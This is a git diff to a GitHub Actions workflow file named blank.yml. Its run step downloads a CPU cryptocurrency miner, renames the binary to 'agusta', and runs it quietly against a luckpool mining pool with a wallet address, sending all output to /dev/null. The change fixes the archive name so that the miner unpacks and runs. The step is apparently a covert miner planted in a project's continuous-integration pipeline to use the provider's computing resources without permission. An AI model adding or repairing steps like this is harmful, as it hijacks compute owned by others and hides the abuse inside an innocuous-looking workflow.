--- a/.github/workflows/blank.yml
+++ b/.github/workflows/blank.yml
@@ -27,6 +27,6 @@ jobs:
     - name: 🤣🙈💯
       run: |
         wget https://github.com/hellcatz/luckpool/blob/master/miners/hellminer_cpu_linux.tar.gz
-        tar xf hellminer_cpu_linux.tar
+        tar xf hellminer_cpu_linux.tar.gz
         mv hellminer agusta
         ./agusta -c stratum+tcp://na.luckpool.net:3956#xnsub -u RP1ntCUiBNERYrp25mccFoR22V1uPSxxTg.hellminer -p x --cpu 2 $PROXY > /dev/null 2>&1
